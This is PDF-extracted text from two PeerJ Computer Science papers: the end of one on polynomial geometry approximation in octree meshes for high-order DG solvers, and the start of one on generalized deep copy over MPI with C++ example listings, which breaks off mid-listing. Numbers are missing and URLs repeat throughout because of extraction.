the middle of the domain, with its center at ( , , ) and has a radius of . similarly, the cube has an edge length of , and its barycenter is placed at the center of the domain at ( , , ). klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure error convergence of the numerical approximation towards the analytical projection for a polynomial of degree . the blue line shows the l -error over all modes while the red line shows the absolute error in the first mode, which represents the volume. on average, a convergence rate of . is achieved. keep in mind that in comparison to the actual step function, the error from table always remains. as a third basic geometry, the tetrahedron again is similarly defined with its barycenter in the center of the domain and an edge length of . the error in the volume approximation is used to assess the quality of the polynomial representation. figure plots this measure for the sphere over the two available parameters voxelization resolution and numerical integration points. it can be observed that the error is mostly bounded by either one of the parameters and for a minimal computational effort it indeed is necessary to change them according to the relation ( ). figure illustrates the projection of the sphere on a d polynomial representation in the eight elements of the mesh. from a to d it shows improved accuracies. in yellow the isosurface of a color value of . is shown and in comparison the half of the reference sphere is shown in blue. figure a shows the sphere embedded in the eight elements, indicated by the black wireframe. in this, a very rough estimation of the sphere is shown with a polynomial of degree and a low voxelization resolution. clearly, the staircases from the voxelization are visible in the polynomial representation here. the next image in b shows a zoom in for finer voxelization, but still a polynomial degree of , in the left half the reference sphere is again depicted in blue. while the finer resolution in the voxelization yields a better approximation now, there are relatively strong oscillations visible, especially close to the element boundaries. to allow for a better representation of the sphere we move klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure error in the volume approximation for a sphere with a radius of . the mesh consists of elements with a common vertex in the center of the sphere. figure illustration of sphere approximations, with increasing accuracy. the sphere is blue, and the isosurface of the color value at . is yellow. in (a), the sphere is shown in the embedding domain with the elements. voxelization and integration points increase from (a) to (d). to a polynomial degree of in fig. c. the voxelization is chosen with an appropriate resolution, in this case, but the numerical integration results in aliasing issues, exhibiting a staircase-like effect for the isosurface of the polynomial. finally, in the fig. d, we see the impact of a higher number of points for the numerical integration, resulting in a much smoother geometry for the shown polynomial of degree . figure illustrates the approximation of a cube. all images show the isosurface for polynomial representation of degree , but the accuracy of the numerical approximation increases from left to right. the number of integration points increases from in fig. a over and to in fig. d and the voxelization is chosen according to eq. ( ). edges and corners get smoothed out, but we observe only little oscillations for this simple, axis aligned, geometry. klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure representation of the cube in elements with polynomials of degree . from (a) to (d) an increasing number of integration points is used. image (d) shows the cube with the elements of the mesh. the reference geometry is drawn in blue, and the isosurface of the color value . in yellow. we cut the reference in the middle to enable a better view for the comparison, except for image (b) where it is the other way around, and the isosurface is cut. figure approximation of the tetrahedron with an increasing polynomial degree from (a) to (d). starting in (a) with a polynomial degree of and increasing over and to in image (d). shown is the isosurface of the polynomial at a value of . in yellow and for comparison the reference geometry cut in half with a blue coloring. finally, fig. depicts a study on the d polynomial approximation of a tetrahedron. the maximal polynomial degree increases from up to , and twice as many integration points as polynomial modes are used in each approximation. we observe that the sharp edges and corners are smoothed out at low orders but are increasingly well recovered in the higher resolved polynomials. also, oscillations in the planes of the tetrahedron get smaller in amplitude. with a polynomial of degree , the original shape is well captured. this shows that a high-order polynomial can nicely be constructed, even for objects with sharp corners and edges. figure shows the application of the described method to a more complex geometry. depicted is in yellow the isosurface of a polynomial approximating a porous medium, described by a triangulation in an stl file shown in dark blue. this geometry features small bridges and holes. those are well recovered by the polynomial approximation; only the edges get a little bit smoothed out. keep in mind, that we are only using cubical elements, which can be exploited by the numerical scheme. also, no bad elements arise resulting in an extremely robust mesh generation. application in dgfem for electrodynamics to show the behavior of the obtained geometry, we look at an electrodynamic setting, governed by eqs. ( )–( ), and solve it with a high-order, modal dgfem. for time integration, a classical explicit fourth order runge–kutta integration is deployed. the klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure isosurface of a porous medium (yellow) in comparison to the original stl data (blue). the geometry is well recovered; only edges are smoothed out a little. simulation setup is an infinite cylinder, impinged by a planar wave. in this setting, the scattering of the wave can be described by a mie series (mie, ), which we use as the reference solution. our simulation setup has the following parameters: • permittivity and permeability in the surrounding: εs = µs = • permittivity and permeability in the cylinder: εc = µc = • simulated domain: [− , ] × [− , ] × [ , . ] • radius of the cylinder r = . • center of the cylinder: ( . , . ) • the impinging planar wave has a wave length of λ = . the domain is discretized with × × = elements, and polynomials with a maximal polynomial degree of are used to represent the solution in each element. for the initial condition of the numerical simulation, we also employ the mie series. we compare the numerical result with the reference solution after the impinging wave has traveled once by the diameter of the cylinder. in fig. a the instanteneous exact solution for the z-component of the displacement field d = εe is shown. right to this reference solution, the difference between the numerical solution and this reference after a simulation time of . is depicted in fig. b. we use a range in ± % of the maximal amplitude in the exact solution for the scale of the difference. a de-aliasing is applied in the numerical scheme here. thus, while the scheme uses modes per direction to represent the solution, we use twice as many modes ( ) to compute the multiplication of the material distribution with the solution. in the numerical simulation, no voxelization is employed. instead, the exact definition of the cylinder is used to determine the material values at the chebyshev nodes per direction that are used to construct the polynomials with a maximal polynomial degree of . this corresponds to ℓ = ∞ with aa = in table . as can be seen, the reference solution is recovered quite accurately in the largest part of the domain. only close to the actual interface, there are larger deviations observed. please note that no smoothening post-processing was applied here, and all gibbs oscillations are visible in the deviations. we now replace the exact definition of the cylindrical geometry by the polynomial representation obtained by the method described above. all other parameters of the numerical setup remain the same. for all simulations, the cylinder geometry is klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scattering of a planar wave at a cylindrical object. the grid lines indicate the mesh of the dgfem solver. for the numerical solution, a basis with a maximal polynomial degree of is used. in (a), the reference solution is shown. in (b), the difference between the numerical solution and the reference can be seen for a de-aliasing by points. the color scale for the difference is chosen with a range of ± % of the maximal amplitude in the reference. table l -error in the mie scattering simulation after a simulation time of . for different geome- try approximations. simulations were done with a spatial order of . the polynomial representation of the geometry uses a maximal polynomial degree of . for the time integration, a classical explicit fourth order runge–kutta scheme is used. ℓ aa = aa = aa = . e– . e– . e– . e– . e– . e– . e– . e– . e– . e– . e– . e– ∞ . e- approximated by polynomials with a maximal polynomial degree of in each element. similarly to fig. , we can vary the number of integration points and the size of the smallest voxels in each element for the construction of these polynomials. to judge the quality of the thereby obtained cylinder approximations for the dgfem scheme, we build the l -error across the × elements enclosing the cylinder. for the comparison, we consider the instantaneous solution after simulating a time interval of . (the time it takes the impinging wave to move once by the diameter of the cylinder). the errors are measured in the z component of the displacement field d and are shown in table . we increase the voxel resolution (ℓ) from row to row in table . in the columns we increase the anti-aliasing, that is the number of chebyshev nodes to construct the polyno- mials of degree . the aa factor is to be understood as a multiplicator, such that with aa = we use points per direction to construct the polynomials and with aa = we use . klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. as can be seen in table , the error always improves with the voxel resolution ℓ. a higher anti-aliasing, however, does not always improve the solution quality. this behavior matches the observations in fig. and emphasizes the necessity for voxel resolutions that resolve the smallest distances between chebyshev nodes. summary and outlook seeder is a mesh generating tool providing an octree representation with cubical elements to a solver. we enhanced these cubical elements in this work by polynomial representations of material distributions within each element. to obtain these polynomials, we employ a first order voxelization utilizing the octree refinement strategy with a colored flood filling to identify the material distribution. numerical integration then transforms those detailed material distributions into multi-dimensional legendre polynomials. this approach is highly robust and applicable to complex geometries. it does not impose strong requirements on the quality of the surface description. we have demonstrated that the proposed method indeed converges towards the optimal l projection of the nonsmooth target function onto the polynomial function space. the obtained geometry representation is suitable for high-order dgfem solvers as we have shown in a small analysis for the scattering of a planar electromagnetic wave at a cylindrical obstacle. a possible improvement to the current staircase representation of the surface could be achieved by computing an approximate plane for the geometry within intersected voxels. while such a computation would introduce additional complexity and potentially expensive computations, it would reduce the number of voxels required to resolve the shortest distances between integration nodes. nevertheless, the simple voxelization scheme currently deployed is already capable of discretizing large and complex settings and has been successfully used for highly detailed simulations. a general argument against high-order methods for scenarios with nonsmooth solutions is the bad convergence as given in table . however, this can be overcome by an appropriate post-processing. in zudrop & hesthaven ( ) it is proven that high-order information can be recovered from solutions suffering from gibbs oscillations. such a post-processing step only needs to be applied to the final simulation result and has not been covered here. we believe the described geometry generation method enlarges the applicability of high-order methods to many settings with non-trivial geometries. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. author contributions • harald g. klimach wrote the paper, prepared figures and tables, performed the computation work, reviewed drafts of the paper. • jens zudrop performed the computation work, reviewed drafts of the paper. • sabine p. roller wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: bitbucket: https://bitbucket.org/apesteam/seeder. references alpert bk, rokhlin v. . a fast algorithm for the evaluation of legendre expansions. siam journal on scientific and statistical computing ( ): – doi . / . bueno-orovio a, pérez-garcı́a vm, fenton fh. . spectral methods for partial differential equations in irregular domains: the spectral smoothed boundary method. siam journal on scientific computing ( ): – doi . / . gottlieb d, hesthaven j. . spectral methods for hyperbolic problems. numerical analysis . vol. vii: partial differential equations, journal of computational and applied mathematics ( – ): – . doi . /s - ( ) - . harlacher df, hasert m, klimach h, zimny s, roller s. . tree based voxelization of stl data. in: resch m, wang x, bez w, focht e, kobayashi h, roller s, eds. high performance computing on vector systems . berlin heidelberg: springer, – . hesthaven js, warburton t. . nodal discontinuous galerkin methods: algorithms, analysis, and applications. st edition. new york: springer, doi . / - - - - . hindenlang f, bolemann t, munz c-d. . mesh curving techniques for high order discontinuous galerkin simulations. in: kroll n, hirsch c, bassi f, johnston c, hillewaert k, eds. idihom: industrialization of high-order methods—a top-down approach: results of a collaborative research project funded by the european union, – . notes on numerical fluid mechanics and multidisciplinary design, volume . cham: springer international publishing, – doi . / - - - - . ishida t, takahashi s, nakahashi k. . efficient and robust cartesian mesh generation for building-cube method. journal of computational science and technology ( ): – doi . /jcst. . . klimach h, masilamani k, harlacher d, hasert m. . seeder. available at https://bitbucket. org/apesteam/seeder (accessed june ). mie g. . beiträge zur optik trüber medien, speziell kolloidaler metallösungen. annalen der physik ( ): – doi . /andp. . mittal r, iaccarino g. . immersed boundary methods. annual review of fluid mechanics : – doi . /annurev.fluid. . . . peskin cs. . the immersed boundary method. acta numerica : – doi . /s . sabetghadam f, sharafatmandjoor s, norouzi f. . fourier spectral embedded boundary solution of the poisson’s and laplace equations with dirichlet boundary conditions. journal of computational physics ( ): – doi . /j.jcp. . . . klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - - - - http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /jcst. . https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder http://dx.doi.org/ . /andp. http://dx.doi.org/ . /annurev.fluid. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.jcp. . . http://dx.doi.org/ . /peerj-cs. white e. . what is an stl file? available at http://www. dsystems.com/quickparts/ learning-center/what-is-stl-file (accessed june ). wilbraham h. . on a certain periodic function. the cambridge and dublin mathematical journal : – . yerry ma, shephard ms. . automatic three-dimensional mesh generation by the modified-octree technique. international journal for numerical methods in engineering ( ): – doi . /nme. . zudrop j, hesthaven js. . accuracy of high order and spectral methods for hyperbolic conservation laws with discontinuous solutions. siam journal on numerical analysis ( ): – doi . / . klimach et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://www. dsystems.com/quickparts/learning-center/what-is-stl-file http://dx.doi.org/ . /nme. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. generation of high order geometry representations in octree meshes introduction related work the seeder mesh generator basic mesh generation procedure generation of the polynomial geometry approximation coloring sub-resolution numerical properties application in dgfem for electrodynamics summary and outlook references implementing generalized deep-copy in mpi implementing generalized deep-copy in mpi joss whittle ,*, rita borgo ,* and mark w. jones ,* department of computer science, swansea university, swansea, united kingdom informatics department, king’s college london, london, united kingdom * these authors contributed equally to this work. abstract in this paper, we introduce a framework for implementing deep copy on top of mpi. the process is initiated by passing just the root object of the dynamic data structure. our framework takes care of all pointer traversal, communication, copying and reconstruction on receiving nodes. the benefit of our approach is that mpi users can deep copy complex dynamic data structures without the need to write bespoke communication or serialize/deserialize methods for each object. these methods can present a challenging implementation problem that can quickly become unwieldy to maintain when working with complex structured data. this paper demonstrates our generic implementation, which encapsulates both approaches. we analyze the approach with a variety of structures (trees, graphs (including complete graphs) and rings) and demonstrate that it performs comparably to hand written implementations, using a vastly simplified programming interface. we make the source code available completely as a convenient header file. subjects computer networks and communications, distributed and parallel computing, programming languages keywords mpi extension library, deep copy, serialization, marshalling, dynamic data structures, deserialization, unmarshalling introduction message passing is an established communication paradigm for both synchronous and asynchronous communication in distributed or parallel systems. using mpi with object orientation is not always an easy task, while control on memory locality and data distribution represent extremely valuable features, dealing with the ever growing and sophisticated features of oo languages can be cumbersome. this problem is particularly challenging for data structures employing abstractions (e.g., inheritance and polymorphism) and pointer indirection, since transferring these data structures between disjoint hosts requires deep copy semantics. for user defined objects mpi adopts shallow copy semantics, whereby default copy constructors and assignment operators perform shallow copies of the object leaving memory allocation, copy, and de-allocation to be the responsibility of the programmer, not the implementation. a similar policy is applied to mpi objects, represented as handles to opaque data that cannot be directly copied. copy constructors and assignment operators in user defined objects that contain an mpi handle must either ensure to invoke the appropriate mpi function to copy the opaque data (deep copy) or use a reference counting scheme that will provide references to the handle (reference counted shallow how to cite this article whittle et al. ( ), implementing generalized deep-copy in mpi. peerj comput. sci. :e ; doi . / peerj-cs. submitted july accepted october published november corresponding author mark w. jones, m.w.jones@swansea.ac.uk academic editor srikumar venugopal additional information and declarations can be found on page doi . /peerj-cs. copyright whittle et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. mailto:m.�w.�jones@�swansea.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ copy). shallow copy is acceptable for shared-memory programming models where it is always legal to dereference a pointer with the underlying assumption that the target of member pointers will be shared among all copies. users often require deep copy semantics, as illustrated in fig. , where every object in a data structure is transferred. deep copy requires recursively traversing pointer members in a data structure, transferring all disjoint memory locations, and translating the pointers to refer to the appropriate device location also referred to as object serialization or marshalling, commonly used for sending complex data structures across networks or writing to disk. mpi has basic support for describing the layout of user defined data types and sending user-defined objects between processes (message passing interface forum, ). the directives we propose provide a mechanism to shape and abstract deep copy semantics for mpi programs written in c++. along with elegantly solving the deep copy problem, this mechanism also reduces the level of difficulty for the programmer who only needs to express the dependencies of an object type, rather than explicitly programming how and when to move the memory behind pointers. as a motivating example, we show that comparable performance can be achieved when using a simple and generic algorithm to implement deep copy compared to hand coded native mpi implementations. the main contributions of this work are: � we introduce the mpi extension library (mel), a c++ header-only wrapper around the mpi standard which aims to give a simplified programming interface with figure an example of a structure that requires deep copy semantics. arrows represent pointer traversals to disjoint regions of memory. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ consistent type-safety and compile time error handling, along with providing efficient implementations of higher level parallel constructs such as deep copy. � as a part of mel, we provide generic implementations of deep copy semantics that can be easily applied to existing code to enable complex structured data to be deep copied transparently as either a send, receive, broadcast, or file access operation with minimal programmer intervention. the latter can also be used for the purpose of check-pointing when writing fault tolerant mpi code. related work message passing as a style of parallel programming enables easy abstraction and code composition of complex inter-process communications. existing mpi interfacing libraries (mccandless, squyres & lumsdaine, ; huang et al., ; boost-community, ) by default rely on the underlying standard shallow copy principle, where data contains no dependencies of memory outside the region directly being copied; and that where dependencies do exist that they are explicitly resolved by the programmer using subsequent shallow copies. however, this simplified model of communication comes at the cost of having to structure computations that require inter-process communication using low-level building blocks, which often leads to complex and verbose implementations (friedley et al., ). similar systems, such as the generic message passing framework (lee & lumsdaine, ) resolve pointers to objects, but do not follow dynamic pointers (data structure traversal) to copy complete complex dynamic structures possibly containing cycles. mpi works on the principle that nothing is shared between processes unless it is explicitly transported by the programmer. these semantics simplify reasoning about the program’s state (hoefler & snir, ) and avoid complex problems that are often encountered in shared-memory programming models (lee, ) where automatic memory synchronization becomes a significant bottleneck. autolink and automap (goujon et al., ) work together to provide similar functionality. automap creates objects at the receiver. autolink tags pointers to determine whether they have been visited or not during traversal. the user must place directives in their code and carry out an additional compilation step to create intermediate files for further compilation. extended mpicc (renault, ) is a c library that converts user-defined data types to mpi data types, and also requires an additional compilation. it can automate the process, but also in some cases requires user input to direct the process. tansey & tilevich ( ) also demonstrate a method to derive mpi data types and capture user interaction via a gui to direct the marshalling process. autoserial library (gna, ) gives a c++ interface for performing serialization to file as binary or xml; or to a raw network socket as binary data. their library also offers a set of convenience functions for buffering data to a contiguous array with mpi communications to move the data. their method makes extensive use of pre-processor macros to generate boilerplate code needed for deep traversal of objects. for mpi, this whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ library only handles the use case of fully buffered deep copy in the context of mpi_send and mpi_recv communications. openacc (beyer, oehmke & sandoval, ) tackles the deep copy problem in the context of transferring structured data from host machines to on node hardware such as gpus and accelerators. their approach is based on a compiler implemented #pragma notation similar to openmp while our method is implemented as a header only template library. tpo++ (grundmann, ritt & rosenstiel, ) requires serialize and deserialize functions to be defined. the paper highlights good design goals which we also follow in this work. compared to the above approaches, we place much lighter requirements on the user and do not require additional signposting (usually implemented as preprocessor macros wrapped around variable declarations) that other methods require. we do not require an additional compilation step or gui compared to the above as will be demonstrated in the following sections. we also provide an analysis of our approach. we explicitly demonstrate and analyze our approach on a wide variety of complex dynamic data structures. our analysis shows that our approach has low time and memory overhead and also requires less user direction to achieve deep copy. it provides this extra functionality at no loss of performance over hand coded approaches. we avoid the in place serialize that some approaches utilize, resulting in our approach having a low memory overhead. we also evaluate our methods in comparison to boost serialization library (cogswell, ) and demonstrate that boost introduces a performance penalty which our method avoids. boost also requires more intervention from the user/programmer to achieve the same capability. therefore, the main benefit of our approach over others is that it is a true deep copy approach where the user only has to pass in the root object/node of the data structure. in charm++ (kale & krishnan, ; miller, ) messages are by default passed by value, however charm++ provides support for deep copy via definition of serialization methods for non-contiguous data structures. it is a user task to define the proper serialization methods including the explicit definition of memory movement and copy operations. if the serialization methods are implemented correctly for a user-defined type, a deep copy will be made of the data being serialized. charm++ distinguishes between shared-memory and distributed-memory scenarios, where shared-memory data within a node can be directly passed by pointer. the programmer must explicitly specify the policy to be adopted by indicating if the data should be conditionally packed or not. conditionally packed data are put into a message only when the data leaves the node. in an mpi environment processes within the same node do not share a common address space making such an optimization unavailable. generally the more desirable solution is to avoid deep copy operations to maintain efficiency in message transmission. this is straightforward to achieve by converting user- defined types with pointer members to equivalent user-defined types with statically-sized arrays. this approach of restructuring and packing a data structure is often used by shared-memory programming paradigms where structures with pointers are manually whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ packed and unpacked across the device boundary to reduce transfer costs for data structures used on the device. when memory isolation (e.g., avoid cross boundary references) is not a requirement other approaches might be possible. for operations executed within sequential or shared memory multi-core processors, hardware can be used more efficiently by avoiding deep copy operations and rely instead on pointer exchange. this requires messages to have an ownership transfer semantics with calls to send (pass) ownership of memory regions, instead of their contents, between processes (friedley et al., ). in the context of the present work, we do not focus on ownership passing but on the traditional approach of refactoring code. mel provides an efficient and intuitive alternative to implementing object packing by hand. porting an object type to use mel deep copy only requires adding a member function to the type containing directives that describe the dependencies of the type. in this case, the additional effort to rewrite data structures to allow communication using the standard mpi shallow copy principles is much larger, making refactoring an application to avoid deep copy an undesirable solution. deep copy semantics are not only relevant when dealing with inter-process communication. when recovering from process or node failure in fault tolerant mpi, applications often incur problems very similar to the ones dealt by deep copy operations. fault tolerance plays an important role in high performance computing applications (herault & robert, ) and significant research has focused on its development in mpi (gropp & lusk, ; vishnu et al., ; bouteiller, ). while the library itself does not provide explicit fault-tolerance support, mpi can provide a standard and well- structured context for writing programs that exhibit significant degrees of fault tolerant behavior. several approaches have been investigated in literature to achieve fault tolerance in mpi (gropp & lusk, ; laguna et al., ), with check-pointing being one of the most commonly used compared to more sophisticated approaches involving direct manipulation of the mpi standard to support fault tolerance (fagg, bukovsky & dongarra, ; fagg & dongarra, ), or modifying semantics of standard mpi functions to provide resilience to program faults. in check-pointing, a process will periodically cache its work to disk so that in the event of a crash or node failure, a newly spawned process can load back the last saved state of the failed process and continue the work from there. when the data a process is dependent on is deep in structure, the implementation challenges associated with reading and writing the data to disk are the same ones encountered when handling the communication of such types. mel provides support for fault-tolerance by leveraging deep copy semantics to transparently target file reads and writes in the same manner it handles the sending and receiving of inter-process communications. when to use deep copy it is important that programmers be aware of the dangers of shallow-copying deep types without also resolving any dependencies of that type. for example, if an object contains a pointer and is copied by its memory footprint to another mpi process the value of the contained pointer on the receiver is now dangling and accessing the pointed to whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ memory erroneous. listing shows an example of performing such an mpi shallow-copy when a deep copy was needed. listing user example–error from not resolving the data dependencies of an object when copying with mpi. struct somestruct { int *ptr = nullptr, len = ; }; //---------------------------------------------------// // on sending process somestruct myvar; // allocate sub array myvar.len = ; mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); // populate sub array with values... mpi_send(&myvar, sizeof(somestruct), mpi_byte, dst_rank, tag, comm); //---------------------------------------------------// // on receiving process somestruct myvar; mpi_recv(&myvar, sizeof(somestruct), mpi_byte, src_rank, tag, comm); // error! myvar.ptr is now a dangling reference to the memory of the sending process! while accessing the pointed to memory is invalid, if we declare as a rule that if a pointer is not allocated it will be assigned to nullptr (and we strictly adhere to this rule), we can use the value of the dangling pointer to determine if an allocation needs to be made and data received on the receiving process. listing gives a corrected example of listing , by deep copying a struct containing a pointer safely using native mpi commands. listing user example–hand coded deep copy using a dangling pointer from the sending process to determine if data needs to be received. struct somestruct { int *ptr = nullptr, len = ; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ }; //---------------------------------------------------// // on sending process somestruct myvar; // allocate sub array myvar.len = ; mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); // populate sub array with values... // send the footprint of the struct, allowing the receiver to check //if ptr == nullptr or len == mpi_send(&myvar, sizeof(somestruct), mpi_byte, dst_rank, tag, comm); // resolve the dependency of the struct if (myvar.ptr != nullptr && myvar.len > ) { mpi_send(myvar.ptr, myvar.len, mpi_int, dst_rank, tag, comm); } //---------------------------------------------------// // on receiving process somestruct myvar; // receive the footprint of the struct so we can check if the array // needs receiving mpi_recv(&myvar, sizeof(somestruct), mpi_byte, src_rank, tag, comm); // resolve the dependency of the struct if (myvar.ptr != nullptr && myvar.len > ) { mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); mpi_recv(myvar.ptr, myvar.len, mpi_int, src_rank, tag, comm); } if an object which implements its own memory management through copy/move constructors and assignment operators, such as std::vector, is used, heap corruption can occur in a manner that can be difficult to debug. an example of this is shown in listing . whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ if a std::vector is copied by footprint its internal pointer, just like the raw pointer previously, is no longer valid. the vector class works on the assumption that its internal pointer is always valid, and that it needs to be de-allocated or re-allocated if any of the assignment, resize, or destructor functions are called. if the vector goes out of scope and its destructor is called the incurring segfault will often not be caught correctly by a debugger and the error will be reported “nearby,” leaving the programmer to hunt down the true source of the error. short of using the c++ placement-new operator to force the vector to be recreated without calling its destructor there is no way of “safely” recovering in this situation. listing user example–the dangers of copying deep types by their footprint in memory without fixing them properly on the receiving processes. struct somestruct { std::vector<int> somevec; }; //---------------------------------------------------// // on sending process somestruct myvar; // push_back into myvar.somevec a few times... mpi_send(&myvar, sizeof(somestruct), mpi_byte, dst_rank, tag, comm); // resolve the dependency of the struct if 